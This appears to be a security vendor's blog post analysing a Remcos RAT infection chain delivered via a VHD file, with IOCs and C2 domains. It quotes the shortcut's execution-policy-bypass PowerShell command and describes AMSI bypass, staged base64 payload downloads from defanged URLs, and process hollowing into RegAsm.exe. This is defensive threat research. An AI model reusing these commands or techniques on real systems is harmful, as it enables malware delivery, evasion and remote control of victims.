Unknown TTPs of Remcos RAT

labs.k7computing.com · Vigneshwaran P · 2 years ago · threat-intel
quality 5/10 · average
0 net
Tags
remcos-rat malware
Unknown TTPs of Remcos RAT - K7 Labs Unknown TTPs of Remcos RAT Posted by K7 Labs March 26, 2024 July 1, 2024 Remote Access Trojan Unknown TTPs of Remcos RAT By K7 Labs March 26, 2024 No Comments --> Typically spread through malicious attachments, drive-by downloads, or social engineering, Remcos RAT has been active since 2016. Initially presented by BreakingSecurity , a European company, as a legitimate remote control tool, it has since been exploited by threat actors for nefarious purposes, despite claims of restricted access for lawful use. On analyzing a few samples from VirusTotal, we got one interesting sample which was a .vhd file. Let’s analyze how threat actors have crafted the VHD (Virtual Hard Disk). After extracting the .vhd file we got a bundle of files shown in Figure 1. Figure 1: Extracted VHDfile The shortcut file has the following powershell command line in target, pointing to the MacOSX.ps1 script. Its deconstructed components are depicted in Figure 1, [ \\localhost\C$\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File ".MacOSX/MacOSX.ps1" ] While analyzing the script we got to know it had several operations in it. Some of the functionality seems to be remnants of old TTP. Download a PDF file as PNG file (Figure 1) Create a Task to download and execute a powershell script. (Figure 2) We found some key functionalities for this script AMSI Bypass (Figure 3) Download a PNG file which is a VB script. (Figure 4) Figure 2: Downloading PDF Figure 3: Schedule task Figure 4: AMSI Reaper AMSIReaper which is an open source tool available in GitHub . Figure 5: Downloading PNG file (elana.png) The command in $binaryData , in Figure6 , downloads a file (elana.png ) from a specified URL ( hxxps://bitbucket.org/openheartplayercertlover/certlover2/downloads/elana.png ) . The PNG file is a VB script file base64 encoded file which is decoded and saved as under %Programdata% as second.ps1 . On further analyzing the png file we got to know it was actually a VB script. Figure 6: VB script in elana.png It defines a function peopaias which creates an instance of Internet Explorer (apegadas), navigates to a blank page, and waits until the page is fully loaded. It then sets up the browser window properties, including position and size. The function waits until a user input element is available on the page and then retrieves the input value before quitting the browser. It also defines a function convertibilidade which takes a string parameter cytiso containing script code and executes it using ExecuteGlobal . From this URL(“hxxp://paste.ee/d/azfhe”) we are able to get the base64 encoded VB script . Figure 7: Encoded VB script After decoding the VB script, we got a PowerShell script which was encoded with base64. Figure 8: Encoded PowerShell script in decoded VB script On executing the script and capturing the output we realized that it was a VB script. Figure 9: VB script in decoded PowerShell script The VB script downloads an image file from the particular URL ( ‘hxxps://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673 ‘ ). Figure 10: Downloading PNG On analyzing this image file we found that it was a base64 encoded value. Figure 11: Base64 value in PNG overlay After decoding it we came to know that it was a PE file. Figure 12: .net binary While analyzing the .NET DLL file in Dnspy we got to know how attackers are using the main payload and where they are using it. The DLL is used to perform the process hollowing that is injecting the Remcos payload into a newly-created “ RegAsm.exe ” process. Once the function is invoked, it finds “RegAsm.exe” from below locations on the victim’s device “C:\Windows\\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”. The following APIs are used for process hollowing: CreateProcess() with CREATE_SUSPENDED flag(0x4), GetThreadContext(), ZwUnmapViewOfSection, .VirtualAllocEx(), WriteProcessMemory(),SetThreadContext(), ResumeThread(). The URL, where the Final Payload is hosted, is stored in a reverse format in the VB script as shown in Figure 13. Figure 13: Reverse URL string The main payload Remcos is a VC8 compiled binary. Figure 14: C++ binary payload It first decrypts a RC4 encrypted blob in the resource section, named “SETTINGS”. Figure 15: Getting resource Figure 16: Manipulating resource In the blob, the first byte “3E” is the size of the RC4 key and the rest is the encrypted Remcos configuration block. Figure 17: Decoded RC4 in setting From this configuration block we can get the C2, malware activities etc. It sets the “RUN” registry for the persistence. Figure 18: Persistence The designated filename for logging victim keystrokes and clipboard data, various settings instructing Remcos on how to initiate its functionalities on the victim’s device, and the authentication details employed for establishing a connection to the C2 server were all crucial components. Figure 19: Keylogging It also creates a mutex to avoid multiple entries of this binary. Remcos also records the audio input from the victim’s microphone. Figure 20: Stealing audio Remcos RAT connects with a URL to collect geolocation information. Figure 21: geolocation The other capability of Remcos RAT is Capturing screenshots of the victim’s screen upon startup. Disabling User Account Control (UAC) on the victim’s device. Sending data to C2. Attackers are always finding fresh strategies to evade the Antivirus (AV) and Endpoint Detection and Response (EDR) system,to secure their ongoing attacks. We at K7 Labs provide detection for Remcos and all the latest threats. Users are advised to use a reliable security product such as “K7 Total Security” and keep it up-to-date to safeguard their devices. IOCs MD5 Detection Name 8E125841810C306790958A95D6DB EB5 Riskware ( 00584baa1 ) C50DC32F0CABCF7D7B44031031026078 Trojan ( 0057ef441 ) AA387BA65FF8C796CBE90FEEC010C008 Trojan ( 0001140e1 ) URLs hxxps://bitbucket.org/openheartplayercertlover/certlover2/downloads/S-Corp_AUELLC1.png hxxps://bitbucket.org/openheartplayercertlover/certlover2/downloads/elana.png hxxps://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673 hxxps://bitbucket.org/!api/2.0/snippets/openheartplayercertlover/jqEMdz/87de249e540d810ba6df8cabeca4b0d89589a73b/files/elanaworkrem hxxp://paste.ee/d/azfhe C2 lora1.safesopkoco.com:2404 lora2.safesopkoco.com:2404 safesopkoco.com:2404 masterbotsbrothers.xyz:2404 mota1.masterbotsbrothers.xyz:2404 mota2.masterbotsbrothers.xyz:2404 lora1.safesopkoco.co:2404 lora2.safesopkoco.co:2404 lora2.safesopko.net:2404 lora1.safesopko.net:2404 Facebook 0 Twitter 0 Linkedin 0 X Like what you're reading? Subscribe to our top stories. If you want to subscribe to our monthly newsletter, please submit the form below. Email * : Categories Activators Cracks Keygens Advanced Persistent Threats Advisory Adware Android Anti-Analysis Techniques Artificial Intelliigence Backdoor Banking Malware Botnet Breaking Cloud malware Cobalt Strike Code Hosting Platform Credential Stealer Crypters Cryptocurrency Cryptolocker Cryptomining Dark Web Data Privacy Deceptive Apps Decryptor Downloaders Email Exploits Fake Applications Hacktivism Internet IoT Keylogger Linux Malware Logging mac malware Macro Malicious DLLs Malicious Links Malware as a Service (MaaS) Malware Crypters Obfuscation Techniques Open Source Packers Password Stealer Personally Speaking Phishing PowerShell Privilege Escalation Protocols Python Python Ransomware Ransomware-as-a-Service (RaaS) Remote Access Software Remote Access Trojan Remote Admin Remote Code Execution Attacks Scams Script-Based Malware Scripting Malware Security Security News Security Tips Smishing Social Networking Apps Spam Spear-phishing Spyware Stager Stealer Trojan Storage Service Abuse Tech Articles Torrents Uncategorized Viruses Vulnerability WhatsApp Worms Featured Posts Fake Telegram Malware Campaign: Analysis of a Multi-Stage Loader Delivered via Typosquatted Websites March 17, 2026 GIBCRYPTO: The Destructive Ransomware with a Snake Keylogger Connection March 11, 2026 Resoker: A Telegram Based Remote Access Trojan March 30, 2026 Recent Posts Resoker: A Telegram Based Remote Access Trojan Fake Telegram Malware Campaign: Analysis of a Multi-Stage Loader Delivered via Typosquatted Websites March 17, 2026 GIBCRYPTO: The Destructive Ransomware with a Snake Keylogger Connection March 11, 2026 Previous Post « Python Ciphering : Delving into Evil Ant’s Ransomware’s Tactics Next Post Security Advisory – Vulnerabilities in Fortinet » More Posts Android Spyware WhatsApp Android SpyBanker: Rerouting Calls to Attackers Dhanalakshmi August 5, 2025 Security Stealer Trojan Off-the-shelf Stealer from Russia: Predator the Thief admin December 17, 2019 Security News Microsoft take Malware advertisers to court administrator September 22, 2009 0 replies on “Unknown TTPs of Remcos RAT”
← Back to stories